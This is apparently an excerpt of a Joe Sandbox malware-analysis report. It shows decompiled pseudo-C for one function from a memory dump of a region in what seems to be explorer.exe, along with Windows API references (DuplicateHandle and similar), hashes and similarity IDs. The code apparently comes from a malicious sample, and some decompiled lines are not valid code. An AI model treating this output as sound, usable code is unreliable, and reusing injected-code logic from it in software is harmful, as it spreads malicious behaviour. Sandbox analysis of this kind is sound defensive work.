                            • Instruction ID: b7eecfca9752b51bd3878614f3e3ca223f58aa9d07610ca166e7e1ee13e62024
                            • Opcode Fuzzy Hash: 1e5d1b1923da54aa82617f9d89ec702fdab843db12d3064c823b188d08538140
                            • Instruction Fuzzy Hash: A431C232604340AFE754FFA4EC859AA77ADFB943A0F54092BF581C32E2DE389C058756
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 73%
                            			E00081B2D(void* __eflags, void* __fp0) {
                            				char _v24;
                            				char _v28;
                            				void* _t12;
                            				intOrPtr _t14;
                            				void* _t15;
                            				intOrPtr _t16;
                            				void* _t17;
                            				void* _t19;
                            				void* _t20;
                            				char _t24;
                            				intOrPtr _t26;
                            				intOrPtr _t28;
                            				intOrPtr _t33;
                            				intOrPtr _t38;
                            				intOrPtr _t40;
                            				void* _t41;
                            				intOrPtr _t46;
                            				void* _t48;
                            				intOrPtr _t51;
                            				void* _t61;
                            				void* _t71;
                            
                            				_t71 = __fp0;
                            				_t38 =  *0x9e6f4; // 0x1e4
                            				_t12 = E0008A4BF(_t38, 0);
                            				while(_t12 < 0) {
                            					E0008980C( &_v28);
                            					_t40 =  *0x9e700; // 0x0
                            					_t14 =  *0x9e704; // 0x0
                            					_t41 = _t40 + 0x3840;
                            					asm("adc eax, ebx");
                            					__eflags = _t14 - _v24;
                            					if(__eflags > 0) {
                            						L13:
                            						_t15 = 0;
                            					} else {
                            						if(__eflags < 0) {
                            							L4:
                            							_t16 =  *0x9e684; // 0xc2f8f0
                            							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x9e6ec, 0);
                            							__eflags = _t17;
                            							if(_t17 == 0) {
                            								break;
                            							} else {
                            								_t33 =  *0x9e684; // 0xc2f8f0
                            								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
                            								_t51 =  *0x9e6f4; // 0x1e4
                            								__eflags = 0;
                            								_t12 = E0008A4BF(_t51, 0);
                            								continue;
                            							}
                            						} else {
                            							__eflags = _t41 - _v28;
                            							if(_t41 >= _v28) {
                            								goto L13;
                            							} else {
                            								goto L4;
                            							}
                            						}
                            					}
                            					L12:
                            					return _t15;
                            				}
                            				E0008980C(0x9e700);
                            				_t19 = GetCurrentProcess();
                            				_t20 = GetCurrentThread();
                            				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x9e6ec, 0, 0, 2);
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				_t24 =  *0x9e6e8; // 0xc2fd78
                            				_v28 = _t24;
                            				_t61 = E00081A1B( &_v28, E0008131E, _t71);
                            				if(_t61 >= 0) {
                            					_push(0);
                            					_push( *0x9e760);
                            					_t48 = 0x27;
                            					E00089F06(_t48);
                            				}
                            				if(_v24 != 0) {
                            					E00086890( &_v24);
                            				}
                            				_t26 =  *0x9e684; // 0xc2f8f0
                            				 *((intOrPtr*)(_t26 + 0x30))( *0x9e6ec);
                            				_t28 =  *0x9e758; // 0x0
                            				 *0x9e6ec = 0;
                            				_t29 =  !=  ? 1 : _t28;
                            				_t46 =  *0x9e6f4; // 0x1e4
                            				 *0x9e758 =  !=  ? 1 : _t28;
                            				E0008A4DB(_t46);
                            				_t15 = _t61;
                            				goto L12;
                            			}

























                            APIs
                            • GetCurrentProcess.KERNEL32(0009E6EC,00000000,00000000,00000002), ref: 00081BCC
                            • GetCurrentThread.KERNEL32(00000000), ref: 00081BCF
                            • GetCurrentProcess.KERNEL32(00000000), ref: 00081BD6
                            • DuplicateHandle.KERNEL32 ref: 00081BD9
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Current$Process$DuplicateHandleThread
                            • String ID:
                            • API String ID: 3566409357-0
                            • Opcode ID: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
                            • Instruction ID: c21506e0fc88ba440ea6bcc6b6f55abd04b465cff164c1f0cab10b664a380183
                            • Opcode Fuzzy Hash: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
                            • Instruction Fuzzy Hash: F13184716043519FF704FFA4EC899AA77A9FF94390B04496EF681C72A2DB389C05CB52
                            Uniqueness

                            Uniqueness Score: -1.00%